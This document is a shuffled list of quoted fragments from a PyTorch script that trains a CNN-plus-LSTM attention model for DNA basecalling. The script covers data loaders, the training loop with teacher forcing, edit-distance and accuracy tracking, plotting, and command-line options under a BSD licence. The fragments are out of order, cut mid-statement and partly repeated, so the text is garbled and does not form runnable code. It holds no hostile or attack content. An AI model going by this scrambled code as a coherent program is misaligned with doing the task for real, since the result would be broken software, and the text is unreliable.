"right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_val.values()))))), np.concatenate(np.array(list(loss_val.values()))),",
"conditions and the following disclaimer in the documentation and/or other materials provided with",
"iteration, data in enumerate(train_loader): model.train() #Set the parameter gradients to zero optimizer.zero_grad() batch_x",
"acc_val[k]) f = open(fname, \"w\") if editD: f.write(\"best performances on trainings set\\n\") f.write(\"trainings",
"result num_chars += len(encoded_target) return editd, num_chars def trainNet(model, train_ds, optimizer, criterion, clipping_value=None,",
"not None: input_x_val = val_ds[0] input_y_val = val_ds[1] input_y10_val = val_ds[2] signal_len_val =",
"(forgetgate * c) + (ingate * cellgate) hy = outgate * F.tanh(cy) #print(\"hy\",",
"attention self.dropout = dropout # Define the LSTM layer if self.bidirectional: if self.attention:",
"[] val_acc = [] val_editd = [] model.eval() total_ed = 0 total_num_chars =",
"parser.add_argument(\"--dropout_input\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--drop_prob', type=float, default=Range(0.0, 1.0), help=\"Dropout probability Encoder-CNN\")",
"attention self.attn = nn.Linear(self.hidden_dim * 4, 1) #self.attn = nn.Linear(self.hidden_dim * 4, self.hidden_dim",
"= {} dict_validation_loss = {} dict_training_acc = {} dict_validation_acc = {} dict_training_editd =",
"updates\") if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(list(editd_train.keys()), list(editd_train.values()), label=\"training edit distance\")",
"from torch.utils.data import Dataset, DataLoader from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import OneHotEncoder",
"SUCH DAMAGE. \"\"\" import h5py import numpy as np import os import sys",
"= 0 for idx, length in enumerate(target_lengths): length = int(length.item()) seq = pred[idx]",
"ed # running_editd_train += ed # editd_iteration.append(ed2) # print(\"edit distance= {0:.4f}\".format((epoch_editd / float(iteration",
"#Forward pass, backward pass, optimize in_lstm, seq_len_cnn = self.cnn_encoder(inputs, seq_len) in_lstm = torch.transpose(in_lstm,",
"Encoder-CNN\") parser.add_argument(\"--batch_norm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) # LSTM arguments parser.add_argument(\"--attention\", type=lambda x:bool(strtobool(x)),",
"the LSTM layer self.lstm = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=self.bidirectional, dropout=self.dropout) # self.lstm_p",
"0:true_batch_size, features # rest: seq, true_batch_size:max_seq_len, features filled with 0 outputs[i, 0:input_decoder.size(0), :]",
"batch_size x out_size x seq_length output, sorted_labels, sorted_labels_len = model(inputs, seq_len, teacher_forcing_ratio, labels,",
"= reshaped_sorted_labels_val != 5 # indices of not padded elements loss_val = criterion(reshaped_output_val,",
"f.write(\"Training: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(train_set[0].size(), train_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(train_set[1].size(), train_set[4]))",
"val_acc.append(acc_val) if editD: ed_val, num_char_ref = convert_to_string(output_val.argmax(2), sorted_labels_val, sorted_labels_len_val) epoch_editd_val += ed_val running_editd_val",
"above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions",
"* 2, 1) #self.attn = nn.Linear(self.hidden_dim * 2, self.hidden_dim) self.linear = nn.Linear(self.hidden_dim, self.output_dim)",
"= {} dict_training_acc = {} dict_validation_acc = {} dict_training_editd = {} dict_validation_editd =",
"label_len, label10, read_idx, batch_size, shuffle=False): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10, read_idx)",
"name: if forget_bias != \"None\" and \"lstm_encoder\" in name: print(name,param.data.size()) n = param.size(0)",
"# CNN input_bias_cnn = args.input_bias_cnn strides = args.strides kernel = args.kernel cnn_out =",
"vs. updates from trainings set\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\")",
"betas=(0.9,0.999)) criterion = torch.nn.NLLLoss(ignore_index=5)#.cuda(port) print(f'The model has {count_parameters(model12):,} trainable parameters') f = open(save_files_path",
"+ 1)))) if updates % make_validation == 0: print(\"=\" * 30) print(\"batch {}",
"torch.zeros(batch_size, self.input_dim).cuda(self.port) # SOS token = 1 [batch size, SOS token] for i",
"int((len(train_loader) * n_epochs)*0.5)) # Backward pass loss.backward() #clipping_value = 1 #arbitrary number of",
"plt.legend() plt.title(\"Error vs. updates from validation set\") ax = fig.add_subplot(1, 3, 2) ax.plot(np.arange(0,",
"the training iteration: print(\"===== HYPERPARAMETERS =====\") print(\"batch_size=\", batch_size) print(\"epochs=\", n_epochs) print(\"gradient clipping=\", clipping_value)",
"= fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_train.values()))))), np.concatenate(np.array(list(loss_train.values()))), label=\"training error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error",
"np.concatenate(np.array(list(editd_train.values()))), label=\"training edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit Distance vs. updates",
"numpy as np import os import sys import torch import torch.nn as nn",
"distance vs. updates from validation set\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\")",
"labels_val, labels10_val = Variable(batch_x_val, requires_grad=False), Variable(batch_y_val, requires_grad=False), Variable(batch_y10_val, requires_grad=False) # batch_size x out_size",
"Edit Distance\") plt.legend() plt.title(\"Edit Distance vs. updates from trainings set\") if pdf is",
"state as return (torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port), torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port)) def forward(self, x, x_lengths):",
"forget gate bias in Decoder-LSTM\") parser.add_argument(\"--bi_lstm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) # teacher",
"+ \"/heatmap_{}.pdf\".format(filename)) plt.clf() if split_LSTMbiases: y_len_biases = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[3]]), x.split(\".\")[2]]) for x in",
"= true_y_len[not_padded_batches] # remove smallest element = last one #print(true_y_len, true_y_len.size()) input_decoder =",
"random.random() out_decoder, decoder_hidden = self.lstm_decoder( sorted_encoder_output, seq_len_cnn, max_label_len, labels10_sorted, teacher_forcing_ratio, sorted_hiddens, sorted_len_target, labels_sorted,",
"torch.utils.tensorboard import SummaryWriter import itertools import seaborn as sns import pandas as pd",
"list(editd_train.values()), label=\"training edit distance\") if validation: ax.plot(list(editd_val.keys()), list(editd_val.values()), label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized",
"= 1 [batch size, SOS token] for i in max_for: # Stop looping",
"label10, read_idx) # create your datset train_loader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0, pin_memory=False, shuffle=shuffle)",
"the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS",
"len(np.concatenate(np.array(list(editd_train.values()))))), np.concatenate(np.array(list(editd_train.values()))), label=\"training edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit Distance vs.",
"validation set\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_activations(input, pdf=None,",
"if epoch == 0: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch), color=\"#000000\", alpha=0.8) else: ax.plot(np.arange(0,",
"mode_type, beam_width=1): # Forward pass through LSTM layer # shape of lstm_in: [batch,",
"+ n//4, n input_biases[idx_b+3, idx] = np.linalg.norm(m[start: end], ord=2) idx_b += 4 y_len",
"# batch_size x out_size x seq_length output_val, sorted_labels_val, sorted_labels_len_val = model(inputs_val, seq_len_val, 0,",
"true_y_len = true_y_len[not_padded_batches] # remove smallest element = last one #print(true_y_len, true_y_len.size()) input_decoder",
"for v in np.concatenate(np.array(list(acc_val.values())))], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs.",
"import sys import torch import torch.nn as nn from torch.autograd import Variable import",
"len(encoded_target) return editd, num_chars def trainNet(model, train_ds, optimizer, criterion, clipping_value=None, val_ds=None, test_ds=None, batch_size=256,",
"EarlyStopping from cnn import SimpleCNN, BasicBlock, SimpleCNN_res from cnn import outputLen_Conv, outputLen_AvgPool, outputLen_MaxPool",
"data[3] batch_y10 = data[4] #Wrap them in a Variable object inputs, labels, labels10",
"input_decoder = input_decoder[not_padded_batches, :] # get only batches that are NOT padded h",
"and len(list(param.data.size())) > 1: nn.init.orthogonal_(param.data) def plot_error_accuarcy(input, pdf=None, steps=50, validation=True, editD=True): sns.set(font_scale=1) loss_train,",
"EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF",
"num_layers self.output_dim = output_dim self.own_cell_decoder = own_cell_decoder self.bidirectional = bidirectional self.port=port self.attention =",
"input gate start, end = 0, n//4 input_biases[idx_b, idx] = np.linalg.norm(m[start: end], ord=2)",
"label if teacher_force else onehot # [batch size, out dim] return outputs, hidden",
"file_out = script_dir + \"/\" + infile print(file_out) with open(file_out, 'rb') as handle:",
"get indices of not padded sequences true_y_len = true_y_len[not_padded_batches] # remove smallest element",
"args.set_seed batch = args.batch_size epochs = args.epochs make_validation = args.make_validation teacher = args.tf_ratio",
"in np.concatenate(np.array(list(acc_val.values())))], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates from",
"def bestPerformance2File(input, fname, editD=True): loss_train, loss_val, acc_train, acc_val, editd_train, editd_val = input[0], input[1],",
"args.make_validation teacher = args.tf_ratio reduced_TF = args.reduced_tf earlyStopping = args.early_stop patience_earlyStop = args.patience",
"= hidden_dim self.batch_size = batch_size self.num_layers = num_layers self.output_dim = output_dim self.own_cell_encoder =",
"lstm_encoder.num_layers == lstm_decoder.num_layers, \"Encoder and decoder must have equal number of layers!\" assert",
"check if it has decresed, # and if it has, it will make",
"encoder batch first: b,len,hidden, hidden: 2,b,hidden attn_applied = torch.bmm(attn_weights.type(torch.FloatTensor).unsqueeze(1).cuda(self.port), encoder_outputs[:, i, :].type(torch.FloatTensor).unsqueeze(1).cuda(self.port)) input_decoder",
"plt.close(\"all\") def plot_heatmap(dict_weights,save_files_path, filename, split_LSTMbiases = False): x_len = list(dict_weights.keys()) y_len = list(dict_weights[x_len[0]].keys())",
"reduce_lr: scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min') #Loop for n_epochs for epoch in range(n_epochs): if",
"# Calculate cross entropy loss # output = (seq*batch, out dim), target =",
"input_decoder = torch.cat((input_decoder, attn_applied.squeeze(1)), dim=1) # input_decoder: b,hidden; attn_applied: b, 1, hidden input",
"plt.title(\"Error vs. updates\") ax = fig.add_subplot(1, 3, 2) ax.plot(list(acc_train.keys()), [v*100 for v in",
"encoded_pred = ''.join(encoded_pred) encoded_target = ''.join([vocab[int(x.item())] for x in seq_target[0:length]]) result = editdistance.eval(encoded_pred,",
"max_for: # Stop looping if we got to the last element in the",
"str(optimizer.param_groups[0]['lr'])) print(\"teacher forcing ratio= {}\".format(teacher_forcing_ratio), \", update= \", updates, \", half of updates=",
":], hidden[0][0]), dim=1)), dim=1) # encoder batch first: b,len,hidden, hidden: 2,b,hidden attn_applied =",
"train_set[3].cuda(port), train_set[4].cuda(port), train_set[5].cuda(port)] val_set = [val_set[0].cuda(port), val_set[1].cuda(port), val_set[2].cuda(port), val_set[3].cuda(port), val_set[4].cuda(port), val_set[5].cuda(port)] print(\"train: \",",
"sns.set(font_scale=1) fig = plt.figure(figsize=(13,4)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.5) i = 0",
"unsorted_idx_hiddens.long()) unsorted_hiddens2 = hidden[1][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) hidden_original = (unsorted_hiddens1, unsorted_hiddens2)#.cpu() unpacked_original =",
"max_in_batch = int(max(true_y_len.cpu())) start_seq = True input_decoder = torch.zeros(batch_size, self.input_dim).cuda(self.port) # SOS token",
"([[dict_training_loss, dict_validation_loss, dict_training_acc, dict_validation_acc, dict_training_editd, dict_validation_editd], [dict_training_loss2, dict_validation_loss2, dict_training_acc2, dict_validation_acc2, dict_training_editd2, dict_validation_editd2], [dict_activations_in,",
"else: m = matrix_param[p] input[idx_p, idx] = np.linalg.norm(m, ord=2) if split_LSTMbiases and \"bias\"",
"nargs='?', const=True, default=False) parser.add_argument(\"--dropout_input\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--drop_prob', type=float, default=Range(0.0, 1.0),",
"# The Encoder # ----------- class LSTMCellEncoder(nn.Module): def __init__(self, input_size, hidden_size, bias=True): super(LSTMCellEncoder,",
"get argmax of prediction #if teacher forcing, use actual next token as next",
"m = matrix_param[p].reshape((matrix_param[p].shape[0], -1)) else: m = matrix_param[p] input[idx_p, idx] = np.linalg.norm(m, ord=2)",
"if (running_acc_train / float(make_validation)) > 0.35 and teacher_forcing_ratio >= 0.25: # if we",
"args.gpu_port SEED = args.set_seed batch = args.batch_size epochs = args.epochs make_validation = args.make_validation",
"np import os import sys import torch import torch.nn as nn from torch.autograd",
"following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice,",
"pack_padded_sequence so that padded items in the sequence won't be shown to the",
"3, 3) ax.plot(list(editd_train.keys()), list(editd_train.values()), label=\"training edit distance\") if validation: ax.plot(list(editd_val.keys()), list(editd_val.values()), label=\"validation edit",
"save_files_path + '{}.pt'.format(fname)) #np.savez_compressed(save_files_path + '{}_weightsGradients.npz'.format(fname), weights=out12[4][0], gradients=out12[4][1]) pickle.dump(out12, open(save_files_path + \"{}.p\".format(fname), \"wb\"",
"#clipping_value = 1 #arbitrary number of your choosing if clipping_value != \"None\": nn.utils.clip_grad_norm_(model.parameters(),",
"order #print(\"in length\", x_lengths) sorted_len, sorted_idx = x_lengths.sort(0, descending=True) index_sorted_idx = sorted_idx.view(-1, 1,",
"dict_validation_editd[epoch] = val_editd # early_stopping needs the validation loss to check if it",
"seq_len = data[2] lab_len = data[3] batch_y10 = data[4] #Wrap them in a",
"= hidden h = h.view(h.size(0), -1) c = c.view(c.size(0), -1) x = x.view(x.size(0),",
"loss_val.item() acc_val = (reshaped_output_val[notpadded_index_val, :].argmax(1) == reshaped_sorted_labels_val[notpadded_index_val] ).sum().item() / reshaped_sorted_labels_val[notpadded_index_val].size(0) epoch_acc_val += acc_val",
"+ 1)) * 100)) if reduce_lr: print(\"lr= \" + str(optimizer.param_groups[0]['lr'])) print(\"teacher forcing ratio=",
"parser.add_argument('--forget_bias_decoder', type=str, default=\"0\", help=\"Set forget gate bias in Decoder-LSTM\") parser.add_argument(\"--bi_lstm\", type=lambda x:bool(strtobool(x)), nargs='?',",
"reshaped_sorted_labels[notpadded_index] ).sum().item() / reshaped_sorted_labels[notpadded_index].size(0) epoch_acc += acc running_acc_train += acc acc_iteration.append(acc) #if editD:",
"LSTMdecoder(input_dim=out_classes, hidden_dim = hidden, batch_size=batch, output_dim=out_classes, num_layers=num_layers, own_cell_decoder=False, bidirectional = bidir, port=port, attention=attention,",
"Distance/train', running_editd_train, updates) writer.add_scalar('Edit Distance/validation', cer, updates) #dict_training_editd2[updates] = running_editd_train #/ float(make_validation) dict_validation_editd2[updates]",
"as np import os import sys import torch import torch.nn as nn from",
"f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], max_idx_val)) f.close() def basecalling(argv):",
"name, param in model12.named_parameters(): if \"bias\" in name: if forget_bias != \"None\" and",
"2-Clause License Copyright (c) 2021 (<EMAIL>) All rights reserved. Redistribution and use in",
"HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR",
"port=port, attention=attention, dropout=dropout) model12 = Seq2Seq(cnn_encoder = CNN, lstm_encoder = lstm, lstm_decoder =",
"batch labels_sorted = labels[sorted_idx_target, :]#.gather(0, sorted_idx_lab.long()) labels10_sorted = labels10[sorted_idx_target, :, :] # batch,",
"'/training_result_{}/'.format(fname) writer = SummaryWriter(script_dir + '/training_result_{}'.format(fname)) train_set = read_data[0] val_set = read_data[1] train_set",
"weight decay={}, clipping value={}, lr={}\\n\" .format(epochs, batch, earlyStopping, patience_earlyStop, weight_decay, clipping_value, lr)) f.write(\"TF={},",
"num_char_ref if editD: cer = float(total_ed) / total_num_chars if updates == 0: writer.add_scalar('Loss/train',",
"self.hidden: (a, b), where a and b both have shape (num_layers, batch_size, hidden_dim).",
"0).cuda(self.port) # (batch, 1, feature) cy = torch.unsqueeze(cy, 0).cuda(self.port) # (batch, 1, feature)",
"\"cell\", \"output\"]: y_len_biases.append(name + \".\" + b) input_biases = np.zeros((len(y_len_biases), len(x_len))) input_grad_biases =",
"max_label_len, labels10_sorted, teacher_forcing_ratio, sorted_hiddens, sorted_len_target, labels_sorted, random_value, mode_type, beam_width) # seq_length x batch_size",
"model(inputs, seq_len, teacher_forcing_ratio, labels, lab_len, labels10, labels.size(1), mode) output = torch.transpose(output, 0, 1).contiguous()",
"print(df_b.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df_b, linewidths=0.0, edgecolor=\"none\") figure2 = svm.get_figure() figure2.savefig(save_files_path + \"/heatmap_{}_biases.pdf\".format(filename))",
"parser.add_argument(\"--attention\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('--dropout', type=float, default=Range(0.0, 1.0), help=\"Dropout probability Encoder-LSTM\")",
"hidden = self.lstm_unroll(input, hidden) # [batch size, seq, hidden dim] lstm_in_unroll = self.linear(lstm_in_unroll.view(-1,",
"dict_validation_editd], [dict_training_loss2, dict_validation_loss2, dict_training_acc2, dict_validation_acc2, dict_training_editd2, dict_validation_editd2], [dict_activations_in, dict_activations_forget, dict_activations_cell, dict_activations_out], [dict_activations_in_decoder, dict_activations_forget_decoder,",
"{} dict_activations_cell_decoder = {} dict_activations_out_decoder = {} dict_training_loss = {} dict_validation_loss = {}",
"# input for LSTM batch_size x seq_length x input_size #### LSTM if (seq_len_cnn",
"open(fname, \"w\") if editD: f.write(\"best performances on trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation",
"= port def reset_parameters(self): std = 1.0 / math.sqrt(self.hidden_size) for w in self.parameters():",
"requires_grad=False), Variable(batch_y_val, requires_grad=False), Variable(batch_y10_val, requires_grad=False) # batch_size x out_size x seq_length output_val, sorted_labels_val,",
"import Dataset, DataLoader from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import OneHotEncoder from torch.utils.tensorboard",
"plot_activations(input, pdf=None, print_epoch=50000, title=\"\"): sns.set(font_scale=1) fig = plt.figure(figsize=(13,4)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2,",
"the output layer if self.bidirectional: if self.attention: # attention self.attn = nn.Linear(self.hidden_dim *",
"target length sorted_len_target, sorted_idx_target = lab_len.sort(0, descending=True) sorted_hiddens1 = encoder_hidden[0][:, sorted_idx_target, :] sorted_hiddens2",
"[batch, seq_len, input_dim] def __init__(self, input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_encoder = False,",
"= attention self.dropout = dropout # Define the LSTM layer if self.bidirectional: if",
"IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE",
"= train_ds[4] read_train = train_ds[5] #Get training data train_loader = get_train_loader_trainVal(input_x, signal_len, input_y,",
"= target[idx] encoded_pred = [] for p in seq: if p == 4:",
"error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates from validation set\") ax = fig.add_subplot(1,",
"type=int, default=[1, 1, 1], help=\"Strides in Encoder-CNN\") parser.add_argument('--kernel', nargs='+', type=int, default=[11, 11, 11],",
"n//4 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) # cellgate, outgate",
"parser.add_argument('-v', '--make_validation', type=int, default=1000, help=\"Make every n updates evaluation on the validation set\")",
"not, use predicted token onehot = torch.zeros(len(top1), self.output_dim).cuda(self.port) onehot[:, top1] = 1 #",
"= encoder_hidden[1][:, sorted_idx_target, :] sorted_hiddens = (sorted_hiddens1, sorted_hiddens2) sorted_encoder_output = ecoder_output[sorted_idx_target, :, :]",
"x in y_len_biases] df_b = pd.DataFrame(input_biases, index=y_len_biases, columns=x_len) print(df_b.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df_b,",
"earlyStopping: early_stopping(np.mean(val_losses), model, optimizer, updates) if early_stopping.early_stop: print(\"Early stopping\") break if reduce_lr: scheduler.step(loss_val)",
"gate start, end = 0, n//4 input_biases[idx_b, idx] = np.linalg.norm(m[start: end], ord=2) #",
"input_decoder = label if teacher_force else onehot # [batch size, out dim] return",
"+ '{}_weightsGradients.npz'.format(fname), weights=out12[4][0], gradients=out12[4][1]) pickle.dump(out12, open(save_files_path + \"{}.p\".format(fname), \"wb\" )) with PdfPages(save_files_path +",
"!= \"None\" and \"lstm_decoder\" in name and \"linear\" not in name: print(name,param.data.size()) n",
"in p: n = matrix_param[p].shape[0] # input gate start, end = 0, n//4",
"from torch.autograd import Variable import torch.nn.functional as F import torchvision import pickle import",
"import seaborn as sns import pandas as pd import argparse from distutils.util import",
"your datset train_loader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0, pin_memory=False, shuffle=shuffle) # create your dataloader",
"if self.attention: # attention self.attn = nn.Linear(self.hidden_dim * 2, 1) #self.attn = nn.Linear(self.hidden_dim",
"= loss_iteration dict_training_acc[epoch] = acc_iteration if editD: dict_training_editd[epoch] = editd_iteration writer.close() if earlyStopping:",
"acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation",
"x out_size # Calculate cross entropy loss # output = (seq*batch, out dim),",
"sorted_labels_val, sorted_labels_len_val) epoch_editd_val += ed_val running_editd_val += ed_val val_editd.append(ed_val) total_ed += ed_val total_num_chars",
"as ticker from matplotlib.backends.backend_pdf import PdfPages import math import torch.optim as optim from",
"{}\\n\".format(train_set[0].size(), train_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(train_set[1].size(), train_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(train_set[5])) f.write(\"Validation: \\nSignal:\\n\")",
"parser.add_argument('--kernel', nargs='+', type=int, default=[11, 11, 11], help=\"Kernel sizes in Encoder-CNN\") parser.add_argument(\"--dropout_cnn\", type=lambda x:bool(strtobool(x)),",
"{}\\n\".format(val_set[1].size(), val_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(val_set[5])) f.write(\"Model:\\n\") f.write(str(model12)) f.write(\"\\nThe model has {:,} trainable parameters\\n\".format(count_parameters(model12)))",
"teacher forcing or not teacher_force = random.random() < teacher_forcing_ratio # put on position:",
"= divmod(rem, 60) print(\"=\" * 100) checkpoint = { 'updates': out12[-1], 'model': model12.state_dict(),",
"h.view(x.size(0), -1) c = c.view(x.size(0), -1) x = x.view(x.size(0), -1) # Linear mappings",
"ticker from matplotlib.backends.backend_pdf import PdfPages import math import torch.optim as optim from torch.utils.data",
"-1) # Linear mappings gates = self.i2h(x) + self.h2h(h) ingate, forgetgate, cellgate, outgate",
"<gh_stars>0 #!/usr/bin/env python \"\"\" BSD 2-Clause License Copyright (c) 2021 (<EMAIL>) All rights",
"dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(val_losses) dict_validation_loss2[updates] = np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc) valid_loss",
"nn.Linear(hidden_size, 4 * hidden_size, bias=bias) # self.reset_parameters() def reset_parameters(self): std = 1.0 /",
"handle: read_data = pickle.load(handle) save_files_path = script_dir + '/training_result_{}/'.format(fname) writer = SummaryWriter(script_dir +",
"plt.xlabel(\"Time Steps\") plt.ylabel(\"Activation\") if i == 1: plt.legend(bbox_to_anchor=(1.05, 1.05)) plt.title(\"{} {}\".format(label, title)) if",
"default=False) parser.add_argument(\"--dropout_input\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--drop_prob', type=float, default=Range(0.0, 1.0), help=\"Dropout probability",
"= {0: \"A\", 1: \"C\", 2: \"G\", 3: \"T\", 4: \"<EOF>\", 5: \"<PAD>\"}",
"length: {}\\n\".format(train_set[1].size(), train_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(train_set[5])) f.write(\"Validation: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(val_set[0].size(), val_set[3]))",
"{}\\n\".format(val_set[0].size(), val_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(val_set[1].size(), val_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(val_set[5])) f.write(\"Model:\\n\") f.write(str(model12))",
"data[4] #Wrap them in a Variable object inputs, labels, labels10 = Variable(batch_x, requires_grad=False),",
"validation: ax.plot(list(editd_val.keys()), list(editd_val.values()), label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit Distance",
"updates) writer.add_scalar('Accuracy/train', np.mean(acc_iteration), updates) writer.add_scalar('Accuracy/validation', np.mean(val_acc), updates) if editD: #writer.add_scalar('Edit Distance/train', running_editd_train, updates)",
"running_acc_val = 0.0 running_editd_train = 0.0 running_editd_val = 0.0 print(\"=\" * 100) print(\"Epoch:",
"ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_val.values()))))), np.concatenate(np.array(list(loss_val.values()))), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates from validation",
"nargs='?', const=True, default=False) # teacher forcing parser.add_argument(\"--reduced_tf\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--tf_ratio',",
"forward(self, encoder_outputs, true_x_len, max_label_len, y, teacher_forcing_ratio, hidden, true_y_len, y_class, random_value, mode_type, beam_width=1): #",
"0 or epoch == max(p.keys()): x = np.arange(0, len(p[epoch].detach().numpy())) # this locator puts",
"size] = 32 is a good default value CNN = SimpleCNN(input_channel=1, output_channel=[cnn_out,cnn_out, cnn_out]",
"in name: print(name,param.data.size()) n = param.size(0) # forget gate start, end = n//4,",
"x out_size x seq_length output_val, sorted_labels_val, sorted_labels_len_val = model(inputs_val, seq_len_val, 0, labels_val, lab_len_val,",
"train_set[1].size(), train_set[2].size(), train_set[3].size(), train_set[4].size(), train_set[5].size()) print(\"validation: \", val_set[0].size(), val_set[1].size(), val_set[2].size(), val_set[3].size(), val_set[4].size(), val_set[5].size())",
"have shape (num_layers, batch_size, hidden_dim). # Sort instances by sequence length in descending",
"# (batch_size*seq, out_dim) input_decoder = F.log_softmax(lstm_in_unroll, dim=1) # (batch_size*seq, out_dim) --> (batch_size, out_dim)",
"f.close() def basecalling(argv): parser = make_argparser() args = parser.parse_args(argv[1:]) infile = args.input fname",
"= val_ds[0] input_y_val = val_ds[1] input_y10_val = val_ds[2] signal_len_val = val_ds[3] label_len_val =",
"hidden dim] max_in_batch = int(max(true_y_len.cpu())) start_seq = True input_decoder = torch.zeros(batch_size, self.input_dim).cuda(self.port) #",
"print(\"edit distance= {0:.4f}\".format((epoch_editd / float(iteration + 1)))) if updates % make_validation == 0:",
"reshaped_sorted_labels != 5 # indices of not padded elements loss = criterion(reshaped_output, reshaped_sorted_labels.long())",
"import torch import torch.nn as nn from torch.autograd import Variable import torch.nn.functional as",
"fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_val.values()))))), [v*100 for v in np.concatenate(np.array(list(acc_val.values())))], label=\"validation accuracy\") plt.xlabel(\"Updates\")",
"1, feature) return hy, (hy, cy), (torch.mean(ingate).cpu(), torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMdecoder(nn.Module): def",
"dict_training_editd = {} dict_validation_editd = {} dict_training_loss2 = {} dict_validation_loss2 = {} dict_training_acc2",
"f.write(\"\\nbest performances on validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val],",
"input_y_val, label_len_val, input_y10_val, batch_size=batch_size, shuffle=True) if earlyStopping: # initialize the early_stopping object early_stopping",
"= SimpleCNN(input_channel=1, output_channel=[cnn_out,cnn_out, cnn_out] , kernel_size=kernel, stride=strides, padding=[0,0,0], pooling=pooling_type, layers=n_layers_cnn, batch_norm=batch_normalization, dropout =",
"default=False) # teacher forcing parser.add_argument(\"--reduced_tf\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--tf_ratio', type=float, default=Range(0.0,",
